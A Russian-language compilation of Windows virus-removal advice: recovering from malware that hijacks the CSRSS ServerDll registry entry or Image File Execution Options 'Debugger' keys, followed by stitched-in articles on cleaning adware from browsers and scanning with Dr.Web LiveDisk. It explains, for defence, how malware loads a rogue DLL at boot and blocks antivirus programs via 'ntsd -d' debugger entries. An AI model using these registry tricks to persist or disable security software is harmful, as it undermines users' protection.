    Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services

    Информация, предназначенная для диспетчера сеансов, находится в ключе реестра

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager

Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems

То найдете значения

ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:

ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)

Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.

Поправить ситуацию можно так:

Загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре.
- загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv . Или выполнить откат системы с использованием точки восстановления.

    Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа:

"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
и перезагружаетесь.

    В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"

    == Май 2008. ==

Дополнение

    Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.

После удаления вируса ни один антивирус не работает.

    Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
    В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:

Опасно - отладчик процесса "avz.exe"="ntsd-d"
Опасно - отладчик процесса "avguard.exe"="ntsd-d"
:.

Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

Раздела с именем avz.exe , содержащем строковый параметр с именем "Debugger" и значением .
И, как выяснилось позже, в указанной ветке присутствовал не только раздел "avz.exe", но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe - вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела???.exe.

    После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.

В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:

Windows Registry Editor Version 5.00

"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
:.. и т.д.

Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).

    Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.

Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.

Поймали вирус в браузере, и теперь постоянно выскакивает реклама? Это ужасно раздражает. Да и вылечить браузер от вирусов не так-то просто. Их еще нужно найти, а многие современные антивирусы попросту не видят эту заразу. Собственно, поэтому у вас и появляются всплывающие окна, а также постоянно открываются рекламные страницы (например, Вулкан или других казино).

Так что делать, если браузер заражен вирусом? Найти и избавиться от него 🙂 . Специально для этого ниже приведено 6 эффективных способов, как удалить вирус из браузера. А в качестве бонуса – пару полезных советов о том, как защитить свой компьютер или ноутбук от повторного заражения.

Как понять, что браузер был заражен? Это можно увидеть по следующим симптомам:

Откуда в браузере появляются вирусы

Современные пользователи очень часто устанавливают игры, программы, расширения и вообще не смотрят, что именно ставят. Просто нажимают «Далее, далее, готово» – и вот еще один рекламный вирус незаметно пролез в вашу систему Windows. В результате появляются всплывающие окна, открываются рекламные страницы и пр.

И в 99% случаев виноват сам пользователь. Почему? Да потому, что обычно лечение браузера от вирусов требуется после:

Сюда же можно добавить отсутствие антивируса на ПК или ноутбуке. Конечно, от всех вирусов он вас не защитит, но некоторые все же обнаружит и удалит. А если думать головой и вручную проверять подозрительные файлы антивирусом, это поможет вам избежать многих проблем. В этом можете быть уверены.

Как почистить браузер от вирусов и рекламы

С причинами и симптомами вирусов разобрались, теперь перейдем к главному. Итак, как избавиться от рекламного вируса в браузере? Здесь все зависит от того, какую именно заразу вы словили. Впрочем, ниже приведена пошаговая инструкция, выполнив которую вы сможете вылечить браузер от различных рекламных вирусов.

Она является универсальной и подходит для любого интернет-браузера – Google Chrome, Opera, Mozilla Firefox, Yandex Browser, Microsoft Edge. Так что пользоваться ею могут все пользователи.

Итак, чтобы избавиться от вирусов в браузере, выполните следующие действия:

Запустите полную проверку ПК или ноутбука антивирусом

Проверьте дополнения в браузере

Некоторые расширения устанавливаются сами. Поэтому зайдите в браузер и проверьте, есть ли там дополнения, которые вы не ставили. Также рекомендуется удалить те из них, которыми не пользуетесь.

Проверьте установленные приложения

Чтобы открыть их, перейдите в Пуск – Панель управления – Программы и компоненты.

Иногда вредоносные модули устанавливаются как обычный софт (например, Webalta). Чтобы удалить вирус, запускающий рекламу в браузере, достаточно лишь найти его и удалить из этого списка.

Проверьте ярлык браузера

Если после его запуска сразу открывается страница Вулкана или другого рекламного сайта, то, скорее всего, проблема кроется в ярлыке. Иногда вирусы прописывают в свойствах ярлыка (в поле «Объект») адрес сайта, который и открывается при запуске браузера. Чтобы решить эту проблему, удалите ярлык и создайте новый.

Проверьте файл hosts

Также многие вирусы редактируют и этот файлик. В результате при открытии какого-то популярного веб-сайта открывается другой (внешне он выглядит так же, и разницы вы не заметите). А далее появляются сообщения с просьбой отправить смс, всплывающие окна, агрессивная реклама и т.д. Убрать этот рекламный вирус можно двумя способами. Первый – с помощью антивирусной утилиты AVZ. А второй – вручную. Для этого:

1. Перейдите по пути C:\Windows\System32\drivers\etc.
2. Откройте файл hosts через блокнот.
3. Удалите лишние строчки. Нормальный файл hosts должен выглядеть следующим образом:

Программы для очистки браузера от вирусов

Также существуют специальные программы для удаления вирусов в браузере. Они видят то, что пропустили антивирусы и помогают избавиться от вредоносных рекламных модулей.

AdwCleaner

Первая отличная программа для очистки браузера от рекламы и вирусов – AdwCleaner (ссылка на оф. сайт).

Эта утилита выполнит быстрый поиск вирусов в браузере и найдет все рекламные тулбары, баннеры, вредоносные скрипты. Также умеет осуществлять очистку ярлыков, файлов и реестра.

Malwarebytes

Еще одна эффективная программа для чистки браузеров от вирусов. Быстро просканирует ПК или ноутбук и поможет избавиться от всплывающих окон и надоевшей рекламы (ссылка на оф. сайт).Ее возможностей более чем предостаточно, чтобы найти вирус в браузере и удалить его.

Защита браузера от рекламы и вирусов

И напоследок, как и обещал, приведу несколько полезных советов о том, как защитить браузер от вирусов:

1. Установите на ноутбук или ПК антивирус. Можно бесплатный. Главное – не забывайте обновлять его (или включите автообновление). В половине случаев он поможет вам удалить вирус из браузера. А точнее – не допустить заражения. Рекомендую прочитать: .
2. Установите программу для удаления рекламных вирусов. То, что пропустят антивирусы, заметят специальные утилиты вроде AdwCleaner или HitmanPRO. При таком сочетании ни одна зараза на ваш ПК просто не пролезет. А для собственного спокойствия периодически запускайте проверку браузера на вирусы (например, 1 раз в месяц).
3. Установите расширение в браузере для блокировки рекламы. Это может быть Adblock или Adguard – на ваше усмотрение. А если захотите отключить рекламу на любимом сайте или блоге (чтобы поддержать его владельца материально), просто добавьте этот веб-ресурс в исключение.

И самое главное: думайте головой! Не загружайте подозрительные exe-файлы (особенно, если вам нужен фильм в формате avi или mkv), не переходите по неизвестным ссылкам, не заходите на сомнительные сайты.

Как говорится, самый лучший антивирус – тот, который сидит по ту сторону монитора 🙂 . То есть, пользователь. Если же вы будете нарушать вышеописанные правила, то никакой антивирус вам не поможет. В интернете нужно быть предельно осторожным – помните об этом!

Начинающие пользователи компьютера довольно часто оказываются в затруднительном положении, ведь вопросы, которые у них появляются, другие, более продвинутые пользователи, считаю банальными. Именно по этой причине очень часто ответы на эти вопросы сложно найти в интернете или же на вопросы отвечает человек, уже забывший, что значит быть начинающим, а значит он использует терминологию и приемы, которые только еще сильнее запутывают новичка.

Это касается и такой тривиальной задачи, как поиск и удаление вирусов.

Я решил создать пошаговую инструкцию, в которой покажу, как бы я действовал, если бы столкнулся с вредоносной программой.

Как определить, что компьютер заражен вирусом

В начале имеет смысл рассказать о признаках, которые явно или косвенно указывают на вирусное заражение.

Во-первых, это уведомление, которое выводит установленный на вашем компьютере антивирус. Это уведомление может выглядеть по разному и текст его может отличаться и зависит от конкретной антивирусной программы.

Но не спешите сразу же впадать в панику. Всегда есть вероятность, что антивирус ошибся или перестраховался.

Не устаю повторять, что антивирусная программа — это не панацея!

Ни один в Мире антивирус не может быть на 100% эффективным, так как разработчики вирусов и вредоносных программ ВСЕГДА находятся на шаг впереди — сначала появляется вирус, а уже затем с ним начинают бороться.

Многие начинающие пользователи имеют неверное представление о работе антивируса. Они считают, что антивирус в своей работе руководствуется только антивирусными базами, которые обновляются ежедневно. Это верно, но отчасти.

Новые вирусы появляются сотнями и тысячами ежедневно и далеко не всегда им присваивается какое-то уникальное имя, под которым они заносятся в антивирусную базу. Такой привилегии удостаиваются только действительно уникальные вредоносные программы. Весь остальной «вирусный ширпотреб» создается, как правило, с помощью вспомогательных программ-конструкторов и антивирус может отловить подобные вирусы по определенным критериям (эвристический анализатор).

Если программа или файл ведут себя по мнению антивируса подозрительно, то есть поведение подпадает под определенные, заложенные в антивирус критерии, то он их заблокирует и выдаст сообщение. Фактически же файл может быть вполне безобидным.

Поэтому антивирус стоит воспринимать исключительно как сигнализацию, которая вполне может иметь (и часто так оно и есть) ложные срабатывания.

Тем не менее, если антивирус «засомневался» и что-то заблокировал, то следует проверить компьютер полностью. При этом я бы рекомендовал делать это не только с помощью установленного на вашем компьютере антивируса, но и использовать альтернативное решение. То есть после полной проверки установленным антивирусом, сделать повторную проверку другой антивирусной программой, о чем я расскажу чуть позже.

Также поводом для проверки компьютера на наличие вирусов может стать любая внештатная ситуация. Например, компьютер стал подтормаживать или внезапно перезагружаться, стали появляться ошибки при запуске программ или при работе операционной системы… В общем, любое ненормальное поведение компьютера стоит воспринимать как сигнал — стоит проверить компьютер антивирусом.

Чем проверять компьютер на наличие вирусов

Как я уже упомянул, с моей точки зрения, правильным будет проверить компьютер не только установленным на компьютере антивирусом, а еще и вторым, хорошо себя зарекомендовавшим антивирусным решением.

При этом я НЕ имею в виду установку второго антивируса на компьютер! НЕТ! Этого делать нельзя!

Я имею в виду, использование антивирусных сканеров, которые можно скачать и запустить без установки, а лучше даже с загрузочной флешки.

Дело в том, что если ваш компьютер заражен, то вирус может спрятаться в системе и блокировать попытки установленного антивируса его обнаружить или удалить.

При загрузке компьютера со специально созданной флешки, с нее будет запущена своя операционная система (обычно это Linux). Это означает, что все файлы вашего жесткого диска будут доступны, так как они не будут защищаться операционной системой Windows, которая установлена на жестком диске вашего компьютера.

Таким образом мы сможем наиболее эффективно проверить все закоулки на вашем жестком диске и с бОльшей долей вероятности обнаружим угрозы.

Подобные загрузочные флешки позволяют создать многие современные антивирусы. То есть можно зайти в меню установленного на вашем компьютере антивируса и с помощью него же создать загрузочную флешку. Но это при условии, что ваш антивирус имеет такую функцию. Об этом можно узнать в справочной системе вашей антивирусной программы.

Я же предпочитаю использовать утилиту Dr.Web LiveDisk . Подобное решение есть и у Касперского, и у других ведущих разработчиков программ защиты, но мне привычнее работать именно с этой программой, поэтому я на ее примере покажу весь процесс.

Создаем флешку с антивирусом

Нам понадобится чистая флешка объемом 1Гб или более, ну или флешка со свободным пространством в 1Гб.
Саму утилиту Dr.Web LiveDisk можно скачать с официального сайта .

После того, как файл скачается, подключите флешку к компьютеру и запустите скачанный файл.

Запустится программа, которая определит все доступные USB-устройства, подключенные к вашему компьютеру. Нужно будет из списка выбрать флешку.

Утилита не удаляет файлы с флешки, но я обычно устанавливаю галочку, которая позволяет полностью отформатировать флешку и поместить на нее только файлы Dr.Web LiveDisk. Мне такой вариант больше нравится, так как для удаления Dr.Web LiveDisk в любом случае нужно форматировать флешку. Поэтому проще сразу временно перенести с нее нужные вам файлы, отформатировать флешку и создать Dr.Web LiveDisk. Когда загрузочный диск вам будет больше не нужен — снова отформатируете флешку и вернете на нее все файлы.

Мы с вами скачали и установили на флешку антивирус с самыми последними антивирусными базами. Это означает, что если вы захотите воспользоваться этой флешкой через некоторое время, то антивирусные базы на ней уже устареют.

Есть возможность обновить антивирусные базы без создания новой флешки, но я обычно так не поступаю. Дело в том, что подобные проблемные ситуации с вирусами у меня возникают довольно редко и мне проще заново создать загрузочную флешку с антивирусом, нежели отвести отдельную флешку под эти цели и в случае необходимости обновлять на ней антивирусные базы.

Как проверить компьютер на вирусы

Итак, флешка готова. Перезагружаем компьютер и запускаемся с флешки.

Для этого можно воспользоваться меню загрузки (Boot Menu). У разных производителей материнских плат и ноутбуков это меню вызывается нажатием разных кнопок на клавиатуре, но обычно это либо клавиша Esc, либо одна из функциональных клавиш — F9, F11, F12. Самый верный способ узнать, какая клавиша в вашем случае вызывает меню загрузки — это обратиться к инструкции от вашего ноутбука или материнской платы. Ну или еще проще — спросить у Яндекса. Для этого так и сформулируем поисковый запрос, например, «меню загрузки клавиша ноутбук asus».

Данную клавишу нужно нажимать сразу же после включения компьютера. Обычно я клавишу не удерживаю, а просто быстро и многократно нажимаю ее до появления меню.

В меню выбираем флешку и начинается процесс загрузки.

По умолчанию установлен английский язык интерфейса, но мы можем исправить ситуацию, переключившись на русский, нажав клавишу F2 и выбрав язык.

Для выбора языка можно воспользоваться клавишами управления курсором — стрелками вверх и вниз. Для подтверждения выбора нажимаем клавишу ENTER.

Данная флешка является комплексным решением для устранения разного рода проблем, поэтому здесь есть, например, утилита для тестирования памяти компьютера, которую можно запустить прямо сейчас. Но я с помощью стрелок выбираю Dr.Web LiveDisk и нажимаю клавишу ENTER.

Будет загружена операционная система Linux и сразу же запустится антивирусный сканер Dr.Web CureIt! Точно такой же сканер можно скачать и запустить из под Windows, но, как я уже сказал ранее, намного правильнее и эффективнее работать с флешки, нежели из под загруженной с жесткого диска операционной системы, поэтому приступим.

Можно начать быструю или задать выборочную проверку, в которой указать те объекты и области на диске, которые вы хотите проверить.

Я запущу быструю, нажатием кнопки «Начать проверку».

После завершения проверки мы получим информацию об обнаруженных угрозах и сможем их обезвредить, выбрав наиболее подходящее действие — выбираем объекты и нажимаем на кнопку «Обезвредить».

Это был самый простой и наиболее быстрый подход к удалению вирусов с компьютера.

Утилита Dr.Web CureIt! имеет настройки и при желании вы можете с ними ознакомиться в инструкции, ссылку на которую я уже дал выше.

Ну а сама флешка Dr.Web LiveDisk – это, как я уже упомянул, не просто антивирусный сканер, а целый набор утилит, предназначенных для восстановления работоспособности компьютера и его частичной диагностики. Здесь вы можете не только удалять вирусы, но и редактировать реестр Windows или работать с файлами и папками на вашем жестком диске. Также здесь есть браузер, с помощью которого вы можете получить нужную вам информацию из интернета.

Подобная флешка неоднократно меня выручала и помогла восстановить не один компьютер…